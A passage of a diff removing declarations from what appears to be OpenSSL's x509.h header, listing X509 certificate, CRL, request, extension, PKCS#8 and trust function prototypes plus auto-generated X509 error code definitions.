-int		i2d_EC_PUBKEY(EC_KEY *a, unsigned char **pp);
-EC_KEY 		*d2i_EC_PUBKEY(EC_KEY **a, const unsigned char **pp,
-			long length);
-#endif
-
-X509_SIG *X509_SIG_new(void);
-void X509_SIG_free(X509_SIG *a);
-X509_SIG *d2i_X509_SIG(X509_SIG **a, const unsigned char **in, long len);
-int i2d_X509_SIG(X509_SIG *a, unsigned char **out);
-extern const ASN1_ITEM X509_SIG_it;
-X509_REQ_INFO *X509_REQ_INFO_new(void);
-void X509_REQ_INFO_free(X509_REQ_INFO *a);
-X509_REQ_INFO *d2i_X509_REQ_INFO(X509_REQ_INFO **a, const unsigned char **in, long len);
-int i2d_X509_REQ_INFO(X509_REQ_INFO *a, unsigned char **out);
-extern const ASN1_ITEM X509_REQ_INFO_it;
-X509_REQ *X509_REQ_new(void);
-void X509_REQ_free(X509_REQ *a);
-X509_REQ *d2i_X509_REQ(X509_REQ **a, const unsigned char **in, long len);
-int i2d_X509_REQ(X509_REQ *a, unsigned char **out);
-extern const ASN1_ITEM X509_REQ_it;
-
-X509_ATTRIBUTE *X509_ATTRIBUTE_new(void);
-void X509_ATTRIBUTE_free(X509_ATTRIBUTE *a);
-X509_ATTRIBUTE *d2i_X509_ATTRIBUTE(X509_ATTRIBUTE **a, const unsigned char **in, long len);
-int i2d_X509_ATTRIBUTE(X509_ATTRIBUTE *a, unsigned char **out);
-extern const ASN1_ITEM X509_ATTRIBUTE_it;
-X509_ATTRIBUTE *X509_ATTRIBUTE_create(int nid, int atrtype, void *value);
-
-X509_EXTENSION *X509_EXTENSION_new(void);
-void X509_EXTENSION_free(X509_EXTENSION *a);
-X509_EXTENSION *d2i_X509_EXTENSION(X509_EXTENSION **a, const unsigned char **in, long len);
-int i2d_X509_EXTENSION(X509_EXTENSION *a, unsigned char **out);
-extern const ASN1_ITEM X509_EXTENSION_it;
-X509_EXTENSIONS *d2i_X509_EXTENSIONS(X509_EXTENSIONS **a, const unsigned char **in, long len);
-int i2d_X509_EXTENSIONS(X509_EXTENSIONS *a, unsigned char **out);
-extern const ASN1_ITEM X509_EXTENSIONS_it;
-
-X509_NAME_ENTRY *X509_NAME_ENTRY_new(void);
-void X509_NAME_ENTRY_free(X509_NAME_ENTRY *a);
-X509_NAME_ENTRY *d2i_X509_NAME_ENTRY(X509_NAME_ENTRY **a, const unsigned char **in, long len);
-int i2d_X509_NAME_ENTRY(X509_NAME_ENTRY *a, unsigned char **out);
-extern const ASN1_ITEM X509_NAME_ENTRY_it;
-
-X509_NAME *X509_NAME_new(void);
-void X509_NAME_free(X509_NAME *a);
-X509_NAME *d2i_X509_NAME(X509_NAME **a, const unsigned char **in, long len);
-int i2d_X509_NAME(X509_NAME *a, unsigned char **out);
-extern const ASN1_ITEM X509_NAME_it;
-
-int		X509_NAME_set(X509_NAME **xn, X509_NAME *name);
-
-X509_CINF *X509_CINF_new(void);
-void X509_CINF_free(X509_CINF *a);
-X509_CINF *d2i_X509_CINF(X509_CINF **a, const unsigned char **in, long len);
-int i2d_X509_CINF(X509_CINF *a, unsigned char **out);
-extern const ASN1_ITEM X509_CINF_it;
-
-X509 *X509_new(void);
-void X509_free(X509 *a);
-X509 *d2i_X509(X509 **a, const unsigned char **in, long len);
-int i2d_X509(X509 *a, unsigned char **out);
-extern const ASN1_ITEM X509_it;
-X509_CERT_AUX *X509_CERT_AUX_new(void);
-void X509_CERT_AUX_free(X509_CERT_AUX *a);
-X509_CERT_AUX *d2i_X509_CERT_AUX(X509_CERT_AUX **a, const unsigned char **in, long len);
-int i2d_X509_CERT_AUX(X509_CERT_AUX *a, unsigned char **out);
-extern const ASN1_ITEM X509_CERT_AUX_it;
-
-X509_CERT_PAIR *X509_CERT_PAIR_new(void);
-void X509_CERT_PAIR_free(X509_CERT_PAIR *a);
-X509_CERT_PAIR *d2i_X509_CERT_PAIR(X509_CERT_PAIR **a, const unsigned char **in, long len);
-int i2d_X509_CERT_PAIR(X509_CERT_PAIR *a, unsigned char **out);
-extern const ASN1_ITEM X509_CERT_PAIR_it;
-
-int X509_get_ex_new_index(long argl, void *argp, CRYPTO_EX_new *new_func,
-	     CRYPTO_EX_dup *dup_func, CRYPTO_EX_free *free_func);
-int X509_set_ex_data(X509 *r, int idx, void *arg);
-void *X509_get_ex_data(X509 *r, int idx);
-int		i2d_X509_AUX(X509 *a,unsigned char **pp);
-X509 *		d2i_X509_AUX(X509 **a,const unsigned char **pp,long length);
-
-int X509_alias_set1(X509 *x, unsigned char *name, int len);
-int X509_keyid_set1(X509 *x, unsigned char *id, int len);
-unsigned char * X509_alias_get0(X509 *x, int *len);
-unsigned char * X509_keyid_get0(X509 *x, int *len);
-int (*X509_TRUST_set_default(int (*trust)(int , X509 *, int)))(int, X509 *, int);
-int X509_TRUST_set(int *t, int trust);
-int X509_add1_trust_object(X509 *x, ASN1_OBJECT *obj);
-int X509_add1_reject_object(X509 *x, ASN1_OBJECT *obj);
-void X509_trust_clear(X509 *x);
-void X509_reject_clear(X509 *x);
-
-X509_REVOKED *X509_REVOKED_new(void);
-void X509_REVOKED_free(X509_REVOKED *a);
-X509_REVOKED *d2i_X509_REVOKED(X509_REVOKED **a, const unsigned char **in, long len);
-int i2d_X509_REVOKED(X509_REVOKED *a, unsigned char **out);
-extern const ASN1_ITEM X509_REVOKED_it;
-X509_CRL_INFO *X509_CRL_INFO_new(void);
-void X509_CRL_INFO_free(X509_CRL_INFO *a);
-X509_CRL_INFO *d2i_X509_CRL_INFO(X509_CRL_INFO **a, const unsigned char **in, long len);
-int i2d_X509_CRL_INFO(X509_CRL_INFO *a, unsigned char **out);
-extern const ASN1_ITEM X509_CRL_INFO_it;
-X509_CRL *X509_CRL_new(void);
-void X509_CRL_free(X509_CRL *a);
-X509_CRL *d2i_X509_CRL(X509_CRL **a, const unsigned char **in, long len);
-int i2d_X509_CRL(X509_CRL *a, unsigned char **out);
-extern const ASN1_ITEM X509_CRL_it;
-
-int X509_CRL_add0_revoked(X509_CRL *crl, X509_REVOKED *rev);
-int X509_CRL_get0_by_serial(X509_CRL *crl,
-		X509_REVOKED **ret, ASN1_INTEGER *serial);
-int X509_CRL_get0_by_cert(X509_CRL *crl, X509_REVOKED **ret, X509 *x);
-
-X509_PKEY *	X509_PKEY_new(void );
-void		X509_PKEY_free(X509_PKEY *a);
-
-NETSCAPE_SPKI *NETSCAPE_SPKI_new(void);
-void NETSCAPE_SPKI_free(NETSCAPE_SPKI *a);
-NETSCAPE_SPKI *d2i_NETSCAPE_SPKI(NETSCAPE_SPKI **a, const unsigned char **in, long len);
-int i2d_NETSCAPE_SPKI(NETSCAPE_SPKI *a, unsigned char **out);
-extern const ASN1_ITEM NETSCAPE_SPKI_it;
-NETSCAPE_SPKAC *NETSCAPE_SPKAC_new(void);
-void NETSCAPE_SPKAC_free(NETSCAPE_SPKAC *a);
-NETSCAPE_SPKAC *d2i_NETSCAPE_SPKAC(NETSCAPE_SPKAC **a, const unsigned char **in, long len);
-int i2d_NETSCAPE_SPKAC(NETSCAPE_SPKAC *a, unsigned char **out);
-extern const ASN1_ITEM NETSCAPE_SPKAC_it;
-NETSCAPE_CERT_SEQUENCE *NETSCAPE_CERT_SEQUENCE_new(void);
-void NETSCAPE_CERT_SEQUENCE_free(NETSCAPE_CERT_SEQUENCE *a);
-NETSCAPE_CERT_SEQUENCE *d2i_NETSCAPE_CERT_SEQUENCE(NETSCAPE_CERT_SEQUENCE **a, const unsigned char **in, long len);
-int i2d_NETSCAPE_CERT_SEQUENCE(NETSCAPE_CERT_SEQUENCE *a, unsigned char **out);
-extern const ASN1_ITEM NETSCAPE_CERT_SEQUENCE_it;
-
-#ifndef OPENSSL_NO_EVP
-X509_INFO *	X509_INFO_new(void);
-void		X509_INFO_free(X509_INFO *a);
-char *		X509_NAME_oneline(X509_NAME *a,char *buf,int size);
-
-int ASN1_item_digest(const ASN1_ITEM *it,const EVP_MD *type,void *data,
-	unsigned char *md,unsigned int *len);
-
-int ASN1_item_verify(const ASN1_ITEM *it, X509_ALGOR *algor1,
-	ASN1_BIT_STRING *signature,void *data,EVP_PKEY *pkey);
-
-int ASN1_item_sign(const ASN1_ITEM *it, X509_ALGOR *algor1, X509_ALGOR *algor2,
-	ASN1_BIT_STRING *signature,
-	void *data, EVP_PKEY *pkey, const EVP_MD *type);
-int ASN1_item_sign_ctx(const ASN1_ITEM *it,
-		X509_ALGOR *algor1, X509_ALGOR *algor2,
-	     	ASN1_BIT_STRING *signature, void *asn, EVP_MD_CTX *ctx);
-#endif
-
-int 		X509_set_version(X509 *x,long version);
-int 		X509_set_serialNumber(X509 *x, ASN1_INTEGER *serial);
-ASN1_INTEGER *	X509_get_serialNumber(X509 *x);
-int 		X509_set_issuer_name(X509 *x, X509_NAME *name);
-X509_NAME *	X509_get_issuer_name(X509 *a);
-int 		X509_set_subject_name(X509 *x, X509_NAME *name);
-X509_NAME *	X509_get_subject_name(X509 *a);
-int 		X509_set_notBefore(X509 *x, const ASN1_TIME *tm);
-int 		X509_set_notAfter(X509 *x, const ASN1_TIME *tm);
-int 		X509_set_pubkey(X509 *x, EVP_PKEY *pkey);
-EVP_PKEY *	X509_get_pubkey(X509 *x);
-ASN1_BIT_STRING * X509_get0_pubkey_bitstr(const X509 *x);
-int		X509_certificate_type(X509 *x,EVP_PKEY *pubkey /* optional */);
-
-int		X509_REQ_set_version(X509_REQ *x,long version);
-int		X509_REQ_set_subject_name(X509_REQ *req,X509_NAME *name);
-int		X509_REQ_set_pubkey(X509_REQ *x, EVP_PKEY *pkey);
-EVP_PKEY *	X509_REQ_get_pubkey(X509_REQ *req);
-int		X509_REQ_extension_nid(int nid);
-int *		X509_REQ_get_extension_nids(void);
-void		X509_REQ_set_extension_nids(int *nids);
-STACK_OF(X509_EXTENSION) *X509_REQ_get_extensions(X509_REQ *req);
-int X509_REQ_add_extensions_nid(X509_REQ *req, STACK_OF(X509_EXTENSION) *exts,
-				int nid);
-int X509_REQ_add_extensions(X509_REQ *req, STACK_OF(X509_EXTENSION) *exts);
-int X509_REQ_get_attr_count(const X509_REQ *req);
-int X509_REQ_get_attr_by_NID(const X509_REQ *req, int nid,
-			  int lastpos);
-int X509_REQ_get_attr_by_OBJ(const X509_REQ *req, ASN1_OBJECT *obj,
-			  int lastpos);
-X509_ATTRIBUTE *X509_REQ_get_attr(const X509_REQ *req, int loc);
-X509_ATTRIBUTE *X509_REQ_delete_attr(X509_REQ *req, int loc);
-int X509_REQ_add1_attr(X509_REQ *req, X509_ATTRIBUTE *attr);
-int X509_REQ_add1_attr_by_OBJ(X509_REQ *req,
-			const ASN1_OBJECT *obj, int type,
-			const unsigned char *bytes, int len);
-int X509_REQ_add1_attr_by_NID(X509_REQ *req,
-			int nid, int type,
-			const unsigned char *bytes, int len);
-int X509_REQ_add1_attr_by_txt(X509_REQ *req,
-			const char *attrname, int type,
-			const unsigned char *bytes, int len);
-
-int X509_CRL_set_version(X509_CRL *x, long version);
-int X509_CRL_set_issuer_name(X509_CRL *x, X509_NAME *name);
-int X509_CRL_set_lastUpdate(X509_CRL *x, const ASN1_TIME *tm);
-int X509_CRL_set_nextUpdate(X509_CRL *x, const ASN1_TIME *tm);
-int X509_CRL_sort(X509_CRL *crl);
-
-int X509_REVOKED_set_serialNumber(X509_REVOKED *x, ASN1_INTEGER *serial);
-int X509_REVOKED_set_revocationDate(X509_REVOKED *r, ASN1_TIME *tm);
-
-int		X509_REQ_check_private_key(X509_REQ *x509,EVP_PKEY *pkey);
-
-int		X509_check_private_key(X509 *x509,EVP_PKEY *pkey);
-
-int		X509_issuer_and_serial_cmp(const X509 *a, const X509 *b);
-unsigned long	X509_issuer_and_serial_hash(X509 *a);
-
-int		X509_issuer_name_cmp(const X509 *a, const X509 *b);
-unsigned long	X509_issuer_name_hash(X509 *a);
-
-int		X509_subject_name_cmp(const X509 *a, const X509 *b);
-unsigned long	X509_subject_name_hash(X509 *x);
-
-#ifndef OPENSSL_NO_MD5
-unsigned long	X509_issuer_name_hash_old(X509 *a);
-unsigned long	X509_subject_name_hash_old(X509 *x);
-#endif
-
-int		X509_cmp(const X509 *a, const X509 *b);
-int		X509_NAME_cmp(const X509_NAME *a, const X509_NAME *b);
-unsigned long	X509_NAME_hash(X509_NAME *x);
-unsigned long	X509_NAME_hash_old(X509_NAME *x);
-
-int		X509_CRL_cmp(const X509_CRL *a, const X509_CRL *b);
-int		X509_CRL_match(const X509_CRL *a, const X509_CRL *b);
-int		X509_print_ex_fp(FILE *bp,X509 *x, unsigned long nmflag, unsigned long cflag);
-int		X509_print_fp(FILE *bp,X509 *x);
-int		X509_CRL_print_fp(FILE *bp,X509_CRL *x);
-int		X509_REQ_print_fp(FILE *bp,X509_REQ *req);
-int X509_NAME_print_ex_fp(FILE *fp, X509_NAME *nm, int indent, unsigned long flags);
-
-#ifndef OPENSSL_NO_BIO
-int		X509_NAME_print(BIO *bp, X509_NAME *name, int obase);
-int X509_NAME_print_ex(BIO *out, X509_NAME *nm, int indent, unsigned long flags);
-int		X509_print_ex(BIO *bp,X509 *x, unsigned long nmflag, unsigned long cflag);
-int		X509_print(BIO *bp,X509 *x);
-int		X509_ocspid_print(BIO *bp,X509 *x);
-int		X509_CERT_AUX_print(BIO *bp,X509_CERT_AUX *x, int indent);
-int		X509_CRL_print(BIO *bp,X509_CRL *x);
-int		X509_REQ_print_ex(BIO *bp, X509_REQ *x, unsigned long nmflag, unsigned long cflag);
-int		X509_REQ_print(BIO *bp,X509_REQ *req);
-#endif
-
-int 		X509_NAME_entry_count(X509_NAME *name);
-int 		X509_NAME_get_text_by_NID(X509_NAME *name, int nid,
-			char *buf,int len);
-int		X509_NAME_get_text_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj,
-			char *buf,int len);
-
-/* NOTE: you should be passsing -1, not 0 as lastpos.  The functions that use
- * lastpos, search after that position on. */
-int 		X509_NAME_get_index_by_NID(X509_NAME *name,int nid,int lastpos);
-int 		X509_NAME_get_index_by_OBJ(X509_NAME *name,ASN1_OBJECT *obj,
-			int lastpos);
-X509_NAME_ENTRY *X509_NAME_get_entry(X509_NAME *name, int loc);
-X509_NAME_ENTRY *X509_NAME_delete_entry(X509_NAME *name, int loc);
-int 		X509_NAME_add_entry(X509_NAME *name,X509_NAME_ENTRY *ne,
-			int loc, int set);
-int X509_NAME_add_entry_by_OBJ(X509_NAME *name, ASN1_OBJECT *obj, int type,
-			unsigned char *bytes, int len, int loc, int set);
-int X509_NAME_add_entry_by_NID(X509_NAME *name, int nid, int type,
-			unsigned char *bytes, int len, int loc, int set);
-X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_txt(X509_NAME_ENTRY **ne,
-		const char *field, int type, const unsigned char *bytes, int len);
-X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_NID(X509_NAME_ENTRY **ne, int nid,
-			int type,unsigned char *bytes, int len);
-int X509_NAME_add_entry_by_txt(X509_NAME *name, const char *field, int type,
-			const unsigned char *bytes, int len, int loc, int set);
-X509_NAME_ENTRY *X509_NAME_ENTRY_create_by_OBJ(X509_NAME_ENTRY **ne,
-			ASN1_OBJECT *obj, int type,const unsigned char *bytes,
-			int len);
-int 		X509_NAME_ENTRY_set_object(X509_NAME_ENTRY *ne,
-			ASN1_OBJECT *obj);
-int 		X509_NAME_ENTRY_set_data(X509_NAME_ENTRY *ne, int type,
-			const unsigned char *bytes, int len);
-ASN1_OBJECT *	X509_NAME_ENTRY_get_object(X509_NAME_ENTRY *ne);
-ASN1_STRING *	X509_NAME_ENTRY_get_data(X509_NAME_ENTRY *ne);
-
-int		X509v3_get_ext_count(const STACK_OF(X509_EXTENSION) *x);
-int		X509v3_get_ext_by_NID(const STACK_OF(X509_EXTENSION) *x,
-				      int nid, int lastpos);
-int		X509v3_get_ext_by_OBJ(const STACK_OF(X509_EXTENSION) *x,
-				      ASN1_OBJECT *obj,int lastpos);
-int		X509v3_get_ext_by_critical(const STACK_OF(X509_EXTENSION) *x,
-					   int crit, int lastpos);
-X509_EXTENSION *X509v3_get_ext(const STACK_OF(X509_EXTENSION) *x, int loc);
-X509_EXTENSION *X509v3_delete_ext(STACK_OF(X509_EXTENSION) *x, int loc);
-STACK_OF(X509_EXTENSION) *X509v3_add_ext(STACK_OF(X509_EXTENSION) **x,
-					 X509_EXTENSION *ex, int loc);
-
-int		X509_get_ext_count(X509 *x);
-int		X509_get_ext_by_NID(X509 *x, int nid, int lastpos);
-int		X509_get_ext_by_OBJ(X509 *x,ASN1_OBJECT *obj,int lastpos);
-int		X509_get_ext_by_critical(X509 *x, int crit, int lastpos);
-X509_EXTENSION *X509_get_ext(X509 *x, int loc);
-X509_EXTENSION *X509_delete_ext(X509 *x, int loc);
-int		X509_add_ext(X509 *x, X509_EXTENSION *ex, int loc);
-void	*	X509_get_ext_d2i(X509 *x, int nid, int *crit, int *idx);
-int		X509_add1_ext_i2d(X509 *x, int nid, void *value, int crit,
-							unsigned long flags);
-
-int		X509_CRL_get_ext_count(X509_CRL *x);
-int		X509_CRL_get_ext_by_NID(X509_CRL *x, int nid, int lastpos);
-int		X509_CRL_get_ext_by_OBJ(X509_CRL *x,ASN1_OBJECT *obj,int lastpos);
-int		X509_CRL_get_ext_by_critical(X509_CRL *x, int crit, int lastpos);
-X509_EXTENSION *X509_CRL_get_ext(X509_CRL *x, int loc);
-X509_EXTENSION *X509_CRL_delete_ext(X509_CRL *x, int loc);
-int		X509_CRL_add_ext(X509_CRL *x, X509_EXTENSION *ex, int loc);
-void	*	X509_CRL_get_ext_d2i(X509_CRL *x, int nid, int *crit, int *idx);
-int		X509_CRL_add1_ext_i2d(X509_CRL *x, int nid, void *value, int crit,
-							unsigned long flags);
-
-int		X509_REVOKED_get_ext_count(X509_REVOKED *x);
-int		X509_REVOKED_get_ext_by_NID(X509_REVOKED *x, int nid, int lastpos);
-int		X509_REVOKED_get_ext_by_OBJ(X509_REVOKED *x,ASN1_OBJECT *obj,int lastpos);
-int		X509_REVOKED_get_ext_by_critical(X509_REVOKED *x, int crit, int lastpos);
-X509_EXTENSION *X509_REVOKED_get_ext(X509_REVOKED *x, int loc);
-X509_EXTENSION *X509_REVOKED_delete_ext(X509_REVOKED *x, int loc);
-int		X509_REVOKED_add_ext(X509_REVOKED *x, X509_EXTENSION *ex, int loc);
-void	*	X509_REVOKED_get_ext_d2i(X509_REVOKED *x, int nid, int *crit, int *idx);
-int		X509_REVOKED_add1_ext_i2d(X509_REVOKED *x, int nid, void *value, int crit,
-							unsigned long flags);
-
-X509_EXTENSION *X509_EXTENSION_create_by_NID(X509_EXTENSION **ex,
-			int nid, int crit, ASN1_OCTET_STRING *data);
-X509_EXTENSION *X509_EXTENSION_create_by_OBJ(X509_EXTENSION **ex,
-			ASN1_OBJECT *obj,int crit,ASN1_OCTET_STRING *data);
-int		X509_EXTENSION_set_object(X509_EXTENSION *ex,ASN1_OBJECT *obj);
-int		X509_EXTENSION_set_critical(X509_EXTENSION *ex, int crit);
-int		X509_EXTENSION_set_data(X509_EXTENSION *ex,
-			ASN1_OCTET_STRING *data);
-ASN1_OBJECT *	X509_EXTENSION_get_object(X509_EXTENSION *ex);
-ASN1_OCTET_STRING *X509_EXTENSION_get_data(X509_EXTENSION *ne);
-int		X509_EXTENSION_get_critical(X509_EXTENSION *ex);
-
-int X509at_get_attr_count(const STACK_OF(X509_ATTRIBUTE) *x);
-int X509at_get_attr_by_NID(const STACK_OF(X509_ATTRIBUTE) *x, int nid,
-			  int lastpos);
-int X509at_get_attr_by_OBJ(const STACK_OF(X509_ATTRIBUTE) *sk, ASN1_OBJECT *obj,
-			  int lastpos);
-X509_ATTRIBUTE *X509at_get_attr(const STACK_OF(X509_ATTRIBUTE) *x, int loc);
-X509_ATTRIBUTE *X509at_delete_attr(STACK_OF(X509_ATTRIBUTE) *x, int loc);
-STACK_OF(X509_ATTRIBUTE) *X509at_add1_attr(STACK_OF(X509_ATTRIBUTE) **x,
-					 X509_ATTRIBUTE *attr);
-STACK_OF(X509_ATTRIBUTE) *X509at_add1_attr_by_OBJ(STACK_OF(X509_ATTRIBUTE) **x,
-			const ASN1_OBJECT *obj, int type,
-			const unsigned char *bytes, int len);
-STACK_OF(X509_ATTRIBUTE) *X509at_add1_attr_by_NID(STACK_OF(X509_ATTRIBUTE) **x,
-			int nid, int type,
-			const unsigned char *bytes, int len);
-STACK_OF(X509_ATTRIBUTE) *X509at_add1_attr_by_txt(STACK_OF(X509_ATTRIBUTE) **x,
-			const char *attrname, int type,
-			const unsigned char *bytes, int len);
-void *X509at_get0_data_by_OBJ(STACK_OF(X509_ATTRIBUTE) *x,
-				ASN1_OBJECT *obj, int lastpos, int type);
-X509_ATTRIBUTE *X509_ATTRIBUTE_create_by_NID(X509_ATTRIBUTE **attr, int nid,
-	     int atrtype, const void *data, int len);
-X509_ATTRIBUTE *X509_ATTRIBUTE_create_by_OBJ(X509_ATTRIBUTE **attr,
-	     const ASN1_OBJECT *obj, int atrtype, const void *data, int len);
-X509_ATTRIBUTE *X509_ATTRIBUTE_create_by_txt(X509_ATTRIBUTE **attr,
-		const char *atrname, int type, const unsigned char *bytes, int len);
-int X509_ATTRIBUTE_set1_object(X509_ATTRIBUTE *attr, const ASN1_OBJECT *obj);
-int X509_ATTRIBUTE_set1_data(X509_ATTRIBUTE *attr, int attrtype, const void *data, int len);
-void *X509_ATTRIBUTE_get0_data(X509_ATTRIBUTE *attr, int idx,
-					int atrtype, void *data);
-int X509_ATTRIBUTE_count(X509_ATTRIBUTE *attr);
-ASN1_OBJECT *X509_ATTRIBUTE_get0_object(X509_ATTRIBUTE *attr);
-ASN1_TYPE *X509_ATTRIBUTE_get0_type(X509_ATTRIBUTE *attr, int idx);
-
-int EVP_PKEY_get_attr_count(const EVP_PKEY *key);
-int EVP_PKEY_get_attr_by_NID(const EVP_PKEY *key, int nid,
-			  int lastpos);
-int EVP_PKEY_get_attr_by_OBJ(const EVP_PKEY *key, ASN1_OBJECT *obj,
-			  int lastpos);
-X509_ATTRIBUTE *EVP_PKEY_get_attr(const EVP_PKEY *key, int loc);
-X509_ATTRIBUTE *EVP_PKEY_delete_attr(EVP_PKEY *key, int loc);
-int EVP_PKEY_add1_attr(EVP_PKEY *key, X509_ATTRIBUTE *attr);
-int EVP_PKEY_add1_attr_by_OBJ(EVP_PKEY *key,
-			const ASN1_OBJECT *obj, int type,
-			const unsigned char *bytes, int len);
-int EVP_PKEY_add1_attr_by_NID(EVP_PKEY *key,
-			int nid, int type,
-			const unsigned char *bytes, int len);
-int EVP_PKEY_add1_attr_by_txt(EVP_PKEY *key,
-			const char *attrname, int type,
-			const unsigned char *bytes, int len);
-
-int		X509_verify_cert(X509_STORE_CTX *ctx);
-
-/* lookup a cert from a X509 STACK */
-X509 *X509_find_by_issuer_and_serial(STACK_OF(X509) *sk,X509_NAME *name,
-				     ASN1_INTEGER *serial);
-X509 *X509_find_by_subject(STACK_OF(X509) *sk,X509_NAME *name);
-
-PBEPARAM *PBEPARAM_new(void);
-void PBEPARAM_free(PBEPARAM *a);
-PBEPARAM *d2i_PBEPARAM(PBEPARAM **a, const unsigned char **in, long len);
-int i2d_PBEPARAM(PBEPARAM *a, unsigned char **out);
-extern const ASN1_ITEM PBEPARAM_it;
-PBE2PARAM *PBE2PARAM_new(void);
-void PBE2PARAM_free(PBE2PARAM *a);
-PBE2PARAM *d2i_PBE2PARAM(PBE2PARAM **a, const unsigned char **in, long len);
-int i2d_PBE2PARAM(PBE2PARAM *a, unsigned char **out);
-extern const ASN1_ITEM PBE2PARAM_it;
-PBKDF2PARAM *PBKDF2PARAM_new(void);
-void PBKDF2PARAM_free(PBKDF2PARAM *a);
-PBKDF2PARAM *d2i_PBKDF2PARAM(PBKDF2PARAM **a, const unsigned char **in, long len);
-int i2d_PBKDF2PARAM(PBKDF2PARAM *a, unsigned char **out);
-extern const ASN1_ITEM PBKDF2PARAM_it;
-
-int PKCS5_pbe_set0_algor(X509_ALGOR *algor, int alg, int iter,
-				const unsigned char *salt, int saltlen);
-
-X509_ALGOR *PKCS5_pbe_set(int alg, int iter,
-				const unsigned char *salt, int saltlen);
-X509_ALGOR *PKCS5_pbe2_set(const EVP_CIPHER *cipher, int iter,
-					 unsigned char *salt, int saltlen);
-X509_ALGOR *PKCS5_pbe2_set_iv(const EVP_CIPHER *cipher, int iter,
-				 unsigned char *salt, int saltlen,
-				 unsigned char *aiv, int prf_nid);
-
-X509_ALGOR *PKCS5_pbkdf2_set(int iter, unsigned char *salt, int saltlen,
-				int prf_nid, int keylen);
-
-/* PKCS#8 utilities */
-
-PKCS8_PRIV_KEY_INFO *PKCS8_PRIV_KEY_INFO_new(void);
-void PKCS8_PRIV_KEY_INFO_free(PKCS8_PRIV_KEY_INFO *a);
-PKCS8_PRIV_KEY_INFO *d2i_PKCS8_PRIV_KEY_INFO(PKCS8_PRIV_KEY_INFO **a, const unsigned char **in, long len);
-int i2d_PKCS8_PRIV_KEY_INFO(PKCS8_PRIV_KEY_INFO *a, unsigned char **out);
-extern const ASN1_ITEM PKCS8_PRIV_KEY_INFO_it;
-
-EVP_PKEY *EVP_PKCS82PKEY(PKCS8_PRIV_KEY_INFO *p8);
-PKCS8_PRIV_KEY_INFO *EVP_PKEY2PKCS8(EVP_PKEY *pkey);
-PKCS8_PRIV_KEY_INFO *EVP_PKEY2PKCS8_broken(EVP_PKEY *pkey, int broken);
-PKCS8_PRIV_KEY_INFO *PKCS8_set_broken(PKCS8_PRIV_KEY_INFO *p8, int broken);
-
-int PKCS8_pkey_set0(PKCS8_PRIV_KEY_INFO *priv, ASN1_OBJECT *aobj,
-			int version, int ptype, void *pval,
-				unsigned char *penc, int penclen);
-int PKCS8_pkey_get0(ASN1_OBJECT **ppkalg,
-		const unsigned char **pk, int *ppklen,
-		X509_ALGOR **pa,
-		PKCS8_PRIV_KEY_INFO *p8);
-
-int X509_PUBKEY_set0_param(X509_PUBKEY *pub, ASN1_OBJECT *aobj,
-					int ptype, void *pval,
-					unsigned char *penc, int penclen);
-int X509_PUBKEY_get0_param(ASN1_OBJECT **ppkalg,
-		const unsigned char **pk, int *ppklen,
-		X509_ALGOR **pa,
-		X509_PUBKEY *pub);
-
-int X509_check_trust(X509 *x, int id, int flags);
-int X509_TRUST_get_count(void);
-X509_TRUST * X509_TRUST_get0(int idx);
-int X509_TRUST_get_by_id(int id);
-int X509_TRUST_add(int id, int flags, int (*ck)(X509_TRUST *, X509 *, int),
-					char *name, int arg1, void *arg2);
-void X509_TRUST_cleanup(void);
-int X509_TRUST_get_flags(X509_TRUST *xp);
-char *X509_TRUST_get0_name(X509_TRUST *xp);
-int X509_TRUST_get_trust(X509_TRUST *xp);
-
-int X509_up_ref(X509 *x);
-
-/* BEGIN ERROR CODES */
-/* The following lines are auto generated by the script mkerr.pl. Any changes
- * made after this point may be overwritten when the script is next run.
- */
-void ERR_load_X509_strings(void);
-
-/* Error codes for the X509 functions. */
-
-/* Function codes. */
-#define X509_F_ADD_CERT_DIR				 100
-#define X509_F_BY_FILE_CTRL				 101
-#define X509_F_CHECK_POLICY				 145
-#define X509_F_DIR_CTRL					 102
-#define X509_F_GET_CERT_BY_SUBJECT			 103
-#define X509_F_NETSCAPE_SPKI_B64_DECODE			 129
-#define X509_F_NETSCAPE_SPKI_B64_ENCODE			 130
-#define X509_F_X509AT_ADD1_ATTR				 135
-#define X509_F_X509V3_ADD_EXT				 104
-#define X509_F_X509_ATTRIBUTE_CREATE_BY_NID		 136
-#define X509_F_X509_ATTRIBUTE_CREATE_BY_OBJ		 137
-#define X509_F_X509_ATTRIBUTE_CREATE_BY_TXT		 140
-#define X509_F_X509_ATTRIBUTE_GET0_DATA			 139
-#define X509_F_X509_ATTRIBUTE_SET1_DATA			 138
-#define X509_F_X509_CHECK_PRIVATE_KEY			 128
-#define X509_F_X509_CRL_PRINT_FP			 147
-#define X509_F_X509_EXTENSION_CREATE_BY_NID		 108
-#define X509_F_X509_EXTENSION_CREATE_BY_OBJ		 109
-#define X509_F_X509_GET_PUBKEY_PARAMETERS		 110
-#define X509_F_X509_LOAD_CERT_CRL_FILE			 132
-#define X509_F_X509_LOAD_CERT_FILE			 111
-#define X509_F_X509_LOAD_CRL_FILE			 112
-#define X509_F_X509_NAME_ADD_ENTRY			 113
-#define X509_F_X509_NAME_ENTRY_CREATE_BY_NID		 114
-#define X509_F_X509_NAME_ENTRY_CREATE_BY_TXT		 131
-#define X509_F_X509_NAME_ENTRY_SET_OBJECT		 115
-#define X509_F_X509_NAME_ONELINE			 116
-#define X509_F_X509_NAME_PRINT				 117
-#define X509_F_X509_PRINT_EX_FP				 118
-#define X509_F_X509_PUBKEY_GET				 119
-#define X509_F_X509_PUBKEY_SET				 120
-#define X509_F_X509_REQ_CHECK_PRIVATE_KEY		 144
-#define X509_F_X509_REQ_PRINT_EX			 121
-#define X509_F_X509_REQ_PRINT_FP			 122
-#define X509_F_X509_REQ_TO_X509				 123
-#define X509_F_X509_STORE_ADD_CERT			 124
-#define X509_F_X509_STORE_ADD_CRL			 125
-#define X509_F_X509_STORE_CTX_GET1_ISSUER		 146
-#define X509_F_X509_STORE_CTX_INIT			 143
-#define X509_F_X509_STORE_CTX_NEW			 142
-#define X509_F_X509_STORE_CTX_PURPOSE_INHERIT		 134
-#define X509_F_X509_TO_X509_REQ				 126
-#define X509_F_X509_TRUST_ADD				 133
-#define X509_F_X509_TRUST_SET				 141
-#define X509_F_X509_VERIFY_CERT				 127
-
-/* Reason codes. */
-#define X509_R_BAD_X509_FILETYPE			 100
-#define X509_R_BASE64_DECODE_ERROR			 118
-#define X509_R_CANT_CHECK_DH_KEY			 114
